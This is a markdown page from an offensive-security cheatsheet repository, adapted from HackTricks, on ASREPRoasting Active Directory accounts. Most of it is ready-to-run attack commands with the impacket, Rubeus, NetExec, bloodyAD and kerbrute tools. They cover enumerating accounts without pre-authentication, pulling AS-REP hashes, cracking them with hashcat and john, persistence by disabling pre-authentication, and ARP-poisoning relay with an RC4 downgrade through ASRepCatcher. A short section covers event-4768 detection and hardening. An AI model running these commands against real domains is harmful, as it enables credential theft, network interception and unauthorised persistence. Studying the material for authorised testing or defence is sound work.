daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

asreproast.md (8290B)


      1 ---
      2 title: "ASREPRoast"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/asreproast.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/asreproast.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # ASREPRoast
     14 
     15 ## ASREPRoast
     16 
     17 ASREPRoast is a security attack that exploits users who lack the **Kerberos pre-authentication required attribute**. Essentially, this vulnerability allows attackers to request authentication for a user from the Domain Controller (DC) without needing the user's password. The DC then responds with a message encrypted with the user's password-derived key, which attackers can attempt to crack offline to discover the user's password.
     18 
     19 The main requirements for this attack are:
     20 
     21 - **Lack of Kerberos pre-authentication**: Target users must not have this security feature enabled.
     22 - **Connection to the Domain Controller (DC)**: Attackers need access to the DC to send requests and receive encrypted messages.
     23 - **Optional domain account**: Having a domain account allows attackers to more efficiently identify vulnerable users through LDAP queries. Without such an account, attackers must guess usernames.
     24 
     25 #### Enumerating vulnerable users (need domain credentials)
     26 
     27 ```bash
     28 Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
     29 ```
     30 
     31 ```bash
     32 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
     33 ```
     34 
     35 #### Request AS_REP message
     36 
     37 ```bash
     38 # Installed package entrypoint (same logic as GetNPUsers.py)
     39 impacket-GetNPUsers -no-pass -usersfile usernames.txt -dc-ip <dc_ip> <domain>/ -format hashcat -outputfile hashes.asreproast
     40 # Use domain creds to LDAP-enumerate roastable users and request them
     41 impacket-GetNPUsers <domain>/<user>:<pass> -request -format hashcat -outputfile hashes.asreproast
     42 # If you are running directly from the examples/ directory
     43 python GetNPUsers.py -no-pass <domain>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
     44 ```
     45 
     46 ```bash
     47 .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username] [/aes]
     48 Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)
     49 ```
     50 
     51 > [!WARNING]
     52 > Rubeus requests **RC4** by default, so Event ID **4768** usually shows **preauth type 0** and **ticket encryption type 0x17**. If you add **`/aes`** (or RC4 is disabled for the target), expect **AES etypes** instead.<sup>[[2]](#references)</sup>
     53 
     54 #### Quick one-liners (Linux)
     55 
     56 - Enumerate potential targets first (e.g., from leaked build paths) with Kerberos userenum: `kerbrute userenum users.txt -d domain --dc dc.domain`
     57 - Roast a whole username list without valid creds using NetExec: `netexec ldap <dc> -u users.txt -p '' --asreproast out.asreproast`<sup>[[3]](#references)[[4]](#references)</sup>
     58 - If you do have creds, let NetExec query LDAP and request every roastable account for you: `netexec ldap <dc> -u <user> -p '<pass>' --asreproast out.asreproast [--kdcHost <dc_fqdn>]`<sup>[[3]](#references)</sup>
     59 - If the output starts with **`$krb5asrep$23$`**, crack it with Hashcat **`-m 18200`**. If it starts with **`$krb5asrep$17$`** or **`$krb5asrep$18$`**, prefer John **`--format=krb5asrep`**.<sup>[[1]](#references)[[2]](#references)</sup>
     60 
     61 ### Cracking
     62 
     63 Don't assume every AS-REP roast is RC4. Modern tooling can return **RC4** (`$krb5asrep$23$`) or **AES** (`$krb5asrep$17$` / `$krb5asrep$18$`) depending on the requested/negotiated enctype. **`hashcat -m 18200`** is for **etype 23**, while **John** handles `krb5asrep` directly for **17/18/23**.<sup>[[1]](#references)[[2]](#references)</sup>
     64 
     65 ```bash
     66 john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproast
     67 hashcat -m 18200 -a 0 hashes.asreproast passwords_kerb.txt # RC4 / etype 23
     68 ```
     69 
     70 ### Persistence
     71 
     72 Force **preauth** not required for a user where you have **GenericAll** permissions (or permissions to write properties):
     73 
     74 ```bash
     75 # Toggle DONT_REQ_PREAUTH on (run it again to toggle it back off during cleanup)
     76 Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
     77 ```
     78 
     79 ```bash
     80 # Enable ASREPRoastability
     81 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH 'target_user'
     82 # Cleanup
     83 bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 remove uac -f DONT_REQ_PREAUTH 'target_user'
     84 ```
     85 
     86 ### Detection and hardening
     87 
     88 A successful roast produces a **4768** event on the DC with `Status=0x0` and `PreAuthType=0`. Do not require RC4 in the detection: `TicketEncryptionType=0x17` is a useful weak-encryption signal, but an attacker can request AES (event-log values `0x11`/`0x12`). On Windows Server 2016 and later with the January 14, 2025 (or newer) cumulative update, version 2 of event 4768 also exposes `ClientAdvertizedEncryptionTypes`, the account/DC supported etypes and available keys.<sup>[[5]](#references)</sup>
     89 
     90 A practical hunt flags a client advertising only RC4 while the account has AES keys, then correlates bursts from one source IP across several no-preauth users. Baseline legitimate exceptions rather than alerting on every `PreAuthType=0` event.
     91 
     92 The durable fix is to clear **Do not require Kerberos preauthentication** on every user that does not strictly need it and rotate exposed account passwords. If an exception cannot be removed, use a long randomly generated password and minimal privileges. Disabling RC4 raises cracking cost but does not remove roastability because AES AS-REP responses remain offline-crackable.<sup>[[2]](#references)[[5]](#references)</sup>
     93 
     94 ## ASREProast without credentials
     95 
     96 An on-path attacker can capture the AS-REP returned during a normal, preauthenticated AS exchange and format its encrypted part for offline cracking. Unlike classic ASREPRoasting, this does not require `DONT_REQ_PREAUTH`; however, it only yields accounts whose Kerberos exchange is actually intercepted. **ASRepCatcher** obtains the position with one-way ARP poisoning by default, or it can consume traffic from another MitM technique with `--disable-spoofing`.<sup>[[6]](#references)</sup>\
     97 If you want the related no-credential trick that returns a **service ticket** instead of a **TGT** from a no-preauth principal, see [Kerberoast](/hacktricks/windows-hardening/active-directory-methodology/kerberoast).
     98 
     99 In `relay` mode, [ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) forwards intercepted AS-REQs and forces **RC4** when both sides still allow it. `listen` does not alter packets and therefore captures whichever enctype the client and DC negotiated. Scope poisoning with `-t`/`-tf` rather than touching the entire subnet when possible.<sup>[[6]](#references)</sup>
    100 
    101 ```bash
    102 # Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
    103 ASRepCatcher relay -dc $DC_IP
    104 
    105 # Disabling ARP spoofing, the mitm position must be obtained differently
    106 ASRepCatcher relay -dc $DC_IP --disable-spoofing
    107 
    108 # Passive listening of AS-REP packets, no packet alteration
    109 ASRepCatcher listen
    110 
    111 # Scope targets and save directly in Hashcat format
    112 ASRepCatcher relay -dc $DC_IP -t 192.168.1.0/24 -outfile hashes.asreproast -format hashcat
    113 ```
    114 
    115 ---
    116 
    117 
    118 ---
    119 
    120 ## References
    121 
    122 - [1] [AS-REP Roasting – ired.team](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
    123 - [2] [Roasting AES AS-REPs – MWR CyberSec](https://mwrcybersec.com/roasting-aes-as-reps)
    124 - [3] [NetExec Wiki – ASREPRoast](https://www.netexec.wiki/ldap-protocol/asreproast)
    125 - [4] [0xdf – HTB Bruno (AS-REP roast → ZipSlip → DLL hijack)](https://0xdf.gitlab.io/2026/02/24/htb-bruno.html)
    126 - [5] [Microsoft – Event 4768: A Kerberos authentication ticket was requested](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4768)
    127 - [6] [Yaxxine7 – ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher)